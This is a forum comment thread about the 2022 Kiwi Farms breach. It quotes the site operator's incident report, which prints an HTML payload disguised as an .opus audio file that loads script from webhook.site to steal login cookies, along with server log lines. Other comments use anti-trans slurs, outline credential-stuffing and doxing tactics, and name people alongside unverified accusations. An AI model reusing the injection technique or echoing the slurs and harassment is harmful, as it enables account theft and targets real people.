all 38 comments

[–][deleted] 27 insightful - 4 fun27 insightful - 3 fun28 insightful - 4 fun -  (20 children)

😨😨😨😨😨

Those troons are going way too far....

[–]Datachost 22 insightful - 2 fun22 insightful - 1 fun23 insightful - 2 fun -  (5 children)

It's insane, all because they refused to back down on archiving what Keffals did. There's no actual proof they were the ones who doxed Keffals, the information for that seems to have come from a different site. The weird Unionist threat against him came from a weird Unionist, not KF, apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Are the regular users of KF slightly obsessive arseholes? Sure, there's no law against being a slightly obsessive arsehole though.

[–]ClassroomPast6178Problematising the things you love. 13 insightful - 2 fun13 insightful - 1 fun14 insightful - 2 fun -  (3 children)

apparently someone had told this guy that Keffals and a friend had been cutting down Union Jacks in the area and replacing them with trans flags.

Seems like a weirdly suicidal thing to do in NI, second only in the “I want to die painfully” stakes to cutting down the tricolour.

[–]Datachost 10 insightful - 1 fun10 insightful - 0 fun11 insightful - 1 fun -  (2 children)

Yeah, considering Keffals is staying with a local I'd like to believe even they aren't dumb enough to do that. Which shows you how weird the bloke is who sent the death threat, that he actually thought that was a believable rumour

[–]ClassroomPast6178Problematising the things you love. 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

There are people that are basically clockwork. You wind them up and watch them do something ridiculously stupid. I had a friend like that at school, he was a nightmare to deal with because other people knew that they could provoke him into extreme violence with the most ridiculously made up stories, needless to say he’s been in court a few times now.

[–]OuroborosTheory 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

[–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

Agree. For others to see: archived thread of Keffals on KF: https://archive.ph/lWQ0v

Back when I was lurking there I didn’t go to Keffals’ thread so I didn’t know who it is, beside just knowing it’s some “big lolcow”. The section in the 1st post titled “Child grooming” (next one “The Catboy Ranch”) is especially interesting, as of course Wikipedia will never tell you about these accusations. https://en.wikipedia.org/wiki/Keffals

[–]FlyingKangaroo 14 insightful - 3 fun14 insightful - 2 fun15 insightful - 3 fun -  (7 children)

This is awful... KF is already “hidden” to everyone who doesn’t know how to access it or isn’t interested in looking for it/who didn’t have an account there, why do this?

[–]brimshaeBased Woodchipper Merchant 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

Because we're not allowed to call out child predators anymore.

[–][deleted] 11 insightful - 2 fun11 insightful - 1 fun12 insightful - 2 fun -  (1 child)

I also would like to know that.... Also, how did those troons even managed to attack the TOR Network?

[–]FlyingKangaroo 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

After all I assume some of them know how to access TOR sites (sometimes certainly for a dark purposes... heh), so? The answer is always someone’s tech skills. Too bad they’re wasted by such degenerates.

[–]ExplodingToasterOven 7 insightful - 2 fun7 insightful - 1 fun8 insightful - 2 fun -  (2 children)

Once you guys have been marked as an "extremist group" "wanna be domestic terrorists" or best of all a "hybrid gang" as in the juggahos, then you're fair game. People will give no more shits about that website or its members being targeted than they care about someone strangling a prostitute in the 80s, throwing a journalist out a 20th story window in Russia, or raping and torturing your Paki maid in Saudi Arabia.

Shit, in this country you might as well be marked as an extremist juggalo jihadi adrenochrome sucking pedo-vore anarchist necro-zoophile. The government has essentially painted a target on your asses for every would be vigilante, both IRL and online, to fuck with.

At this point you could just about team up with ISIS, Antifa, the Temple of Set, the Proud Boys, and David Fucking Duke, and you wouldn't be any less despised. :D

And while this sounds like an exaggeration, uh, no, its not. You guys are well and truly fucked. Best bet is, find somewhere else to hang out. Get a new hobby for 6-9 months that does not involve stalking troons, strangling rent boys, humping dead animals, tormenting furries, or whatever else you people are into over there.

Remember, america at large has the attention span of a squirrel on mescalin. Keep your heads down, your mouths shut, glue your fucking fingers together, get our of your mom's basement, and pretend like you're real people for at least a few months. Get some fucking sunlight, hang out at bars, maybe meet some drunken slut to have an ill advised fling with, and have something like a real life.

And THEN you can go back into the basement come winter, and fuck around as usual. lol!

[–]Datachost 12 insightful - 2 fun12 insightful - 1 fun13 insightful - 2 fun -  (1 child)

At this point you could just about team up with ISIS

Unlikely. Even ISIS get to have a twitter account.

[–]ExplodingToasterOven 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (0 children)

Sure, because its easier to track them when they're using at least one known media outlet. Same thing happened with Sinn Fein, the IRA got their media guy to spout off for them, and as part of coordinating their media presence, this tended to slow them down from any spontaneous action that might be "off message".

[–]Dzonatan 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

Keffals caused a Streisand Effect with his every move and is too arrogant to change his approach.

A subset of spectators have a "oh really?" approach and don't take things at face value. What do I mean by this? Here's some examples:

Keffals proclaims that KF is a den of nazis. Someone goes "oh really? I want to check it out and see for myself".

Keffals proclaims that KF is down. Someone goes "oh really? I'll go check it out and see if it's really down".

Keffals proclaims that KF is using TOR. Someone goes "oh really? What's TOR in the first place? I'll go check it out".

Shame doesn't work on curious people and the longer it goes the more people start paying attention. There's only one thing Null needs to do. Keep being stubborn and bring site back up over and over and over again. Eventually Keffals will lose his paitiance and do something so drastic that not even troon status will protect him from jail time.

In his latest update Null had to go for a week. Before that there were some murmurs about his family problems and some mention about his family being threatened. That sounds to me like Keffals is on the verge of madness and is just logistics away from grabbing a knife and going to his country.

[–]ExplodingToasterOven 9 insightful - 2 fun9 insightful - 1 fun10 insightful - 2 fun -  (2 children)

lol! This looks more like a contract hit. And probably not a real expensive one as the forum hacker was doing some script kiddie shit.

[–][deleted] 6 insightful - 4 fun6 insightful - 3 fun7 insightful - 4 fun -  (1 child)

Lmao So these troons wasted money on some amateur hacker? Good, served those fags right. Now they have much less money for their estrogen shots, lol🤡🤡🤡

[–]deusex 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (1 child)

This is cyberterrorism. Simple as.

[–]handbananasrevenge 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (0 children)

Cyberterrorism cheered on by social terrorists.

[–]FlyingKangaroo 1 insightful - 1 fun1 insightful - 0 fun2 insightful - 1 fun -  (0 children)

On such topics it’s also good to know that they also attacked lolcow.farm in the past, posting very disgusting illegal materials there... Discussion about the topic here: https://lolcow.farm/meta/res/44601.html#q44601

[–][deleted] 20 insightful - 1 fun20 insightful - 0 fun21 insightful - 1 fun -  (6 children)

That explains why I couldn't get on today I guess. I hope they don't come for saidit next. Whenever a space exists for people who aren't SJWs now it seems like it either gets compromised or destroyed. I just want to talk to like minded people instead of militant leftists. I'd be fine with them staying on sites for that if there were sites for other people to maybe vent or joke or talk about it, especially because I live in Canada and it is hard to find people my age who are not obsessed with bring up race or gender or something about how weapons are bad but complain when women need to be cautious on their own because they might get assaulted, we can't have even pepper spray and men can get assaulted too but apparently having any self defense that isn't your own body is the only way.

I can't talk about this stuff in real life. Plus the transgender ideology has really gotten big here. It targets a lot of mentally ill young women here, I almost believed it when I was like 14 because I was really insecure and lonely cause I didn't like makeup (Only cause I felt like it was like lying and I wanted to be pretty without it) so I got caught up in their forums and since I had no free time or anyone to say "Hey, that stuff is not right, you are a teenager and just figuring stuff out" I read the subreddits and almost ended up socially coming out and asking my therapist about being transgender, but thankfully she brushed it off and so did my parents and I got over it a year or two later, thank god. I realized it was all a bunch of nonsense when I met my older cousin one day. She was going by male pronouns but she wasn't on any hormones, she was autistic and she kept saying things like dissociating like me, a 14 year old girl knew what it even meant, she was nice and stuff but she seemed really unwell. It freaked me out honestly, I realized I didn't want to end up like she did, I know that is really rude but she was really off.

I cannot say any of that to anyone in real life, I need somewhere online or something, just so I can blow off some steam from this sjw stuff in my own life, it is everywhere and people have places if they are sjws but they can't stand when we want to just have something to ourselves.

Sorry for ranting, I know it isn't a big deal but I don't know anyone my age in real life who isn't super left wing now. I know I sound dramatic and it isn't the end of the world (not literally I guess) but I just want to go on a forum or website without the preachy tones. I'm just a bit disappointed because the internet is getting super boring without dissent. Oh well. I found Kiwifarms to be refreshing compared to most sites now, I am surprised these people can't let go of their obsession with taking it down.

[–]filbs111 14 insightful - 1 fun14 insightful - 0 fun15 insightful - 1 fun -  (2 children)

Being a young woman with a brain in Canada must be a pain in the arse. It worked out for Lindsay Shepherd though. Stay the course!

[–][deleted] 8 insightful - 1 fun8 insightful - 0 fun9 insightful - 1 fun -  (0 children)

Thank you! I have one good friend in my area but it can get lonely otherwise!

[–]FlyingKangaroo 5 insightful - 1 fun5 insightful - 0 fun6 insightful - 1 fun -  (0 children)

Thank God I don’t live in Canada.

[–]ExplodingToasterOven 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (2 children)

Saidit is not even a blip on the radar. They might as well look for you clowns at an AA/NA meeting for all that was worth. :D

GAB is probably the most likely target, and they've already hit those guys at least twice, forgot about them, and moved on.

Quora, that still has quite a few people ranting and raving, but the demographic there is like 45+ at a minimum. Its more a place for senior citizens to shake their fists at the young SJW punks, starbucks trashing antifa rejects, and useless politicians in general.

Again, best bet is for most of the KF rejects to find another hobby, if only for 2-3 months, by which time the attention span of the usual wanna be hacktivists will be onto something else. Like video hackers doing deepfakes of disney princesses to make them white. :D

[–][deleted] 4 insightful - 1 fun4 insightful - 0 fun5 insightful - 1 fun -  (1 child)

Eh, I don't think I'm a clown for being concerned about this stuff. An idiot maybe but everyone is different I guess.

[–]VulptexMy pronouns are the/matrix 12 insightful - 1 fun12 insightful - 0 fun13 insightful - 1 fun -  (3 children)

How would they get their passwords? I would hope it's not stored in plain text.

[–]IMissPorn 13 insightful - 1 fun13 insightful - 0 fun14 insightful - 1 fun -  (0 children)

They probably didn't. This announcement is just saying that given the severity of the breach, you should assume it has been compromised and respond accordingly.

[–]ClassroomPast6178Problematising the things you love. 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (1 child)

About ten or fifteen years ago it would be with rainbow tables, but these days you can run hash crackers on GPUs. A couple of breaches over the years allowed the collection of millions of hashed passwords which have now been cracked, so combine the hash cracker software with the database of cracked hashes and, whilst it still isn’t trivial, it’s not rocket science either to reveal passwords. Passwords need to go the way of the dodo, we need a better security solution.

Have I been pwned is a very useful resource.

This article is a little out of date, but it explains everything really well.

[–]ExplodingToasterOven 2 insightful - 1 fun2 insightful - 0 fun3 insightful - 1 fun -  (0 children)

This is a bit more up to date. https://darknetdiaries.com/episode/

https://www.youtube.com/c/BlackHatOfficialYT/videos

The main reason people play the long game is.. Most people have no idea WTF to do if their phone gets stolen. Thing like rolling your passwords over in less than 4-8 hours, freezing your credit on any cards linked to your phone apps, and making sure your fucking 2FA is not linked to a number on a phone number, ANY phone number, no matter how well controlled.

So they'll sift for hashes, crack passwords, and try them on other sites that seem to match a given person. So if you have the same bitmap or jpg avatar on 20 forums, they'll fucking run that password on ALL of them. Because while people may use opsec on Kiwifarm which is likely a target for direct retaliation, they probably give no shits about their regular accounts other places.

First place they'll hit, probably gonna be your google account, facebook, linkedin. They'll do the usual doxing shit of seeing if anyone is mentioning a KFers IRL name on various facebook groups from say, your high school, college, whatever. And from there, onto the gaming accounts, discord, mumble. If they can dig through your chat logs, find all the crazy shit you were into, and make an anon dump of this to your employer, college admins office, parole officer(probably quite of few of your KFers will have one of these soon, if not already).

They're going to do to you guys, what you're already infamous for. But with the intensity of a Perverted Justice crew who've been fed near lethal doses of Nazi Crank and Cheetos, given a list of passwords for known "particular" youth obsessed members of the clergy in a region, military grade VPNs, source spoofing and hacking tools, and legal immunity. So essentially, something like the entire North Korean hacking crew is after your asses. :D

With the Jan 6th whistleblowers, snitches, they were mainly just trying to get rid of asshole parents, uncles, people nuts enough to do a mag dump into a squirrel who ran across the fence line and set off a motion light. Crazy fuckers in essence.

But, with the swatting, and other illegal stalker shit KF is infamous for, you guys have BECOME the crazy assed drunk Jan 6th uncles who need to be put away..

[–]ClassroomPast6178Problematising the things you love. 7 insightful - 1 fun7 insightful - 0 fun8 insightful - 1 fun -  (0 children)

I guess this is why they had so many warnings about Opsec when you signed up to KF, this scenario being the worst case.

[–]jet199 5 insightful - 4 fun5 insightful - 3 fun6 insightful - 4 fun -  (2 children)

Your passwords were likely protected because our system can't cope with small data export requests.

[–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

It's not a bug, it's a security feature!

[–]notafed 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

I use different passwords for every site. I'm not worried about that.

[–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

From kiwifarms.net:

Site Breach

User Impact Statement

The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.

Thankfully, most users pay attention to my privacy checkups and there isn't much to leak. You should take a moment to read privacytools.io, even if you hate this site. Use an email address freom a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyTools. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence.

Prognosis

The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation

Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data. The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url> </script>

I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.

The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 You can find relevant scripts below.

https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
jcmoon@pm.me

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.

[–]sproketboy 2 insightful - 3 fun2 insightful - 2 fun3 insightful - 3 fun -  (1 child)

r/lolphp

[–]omegamissingnopneumonoultramicroscopicsilicovolcanoconiosisexualgender 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

wrong site

[–]FlyingKangaroo 3 insightful - 1 fun3 insightful - 0 fun4 insightful - 1 fun -  (0 children)

Some current KF discussion from Lolcow.farm: https://lolcow.farm/snow/res/1649200.html#q1649200

Osaki, the trans wolf, is sending a fake document (containing false allegations of CSAM in the farms) to every domains

Now that’s something I didn’t know.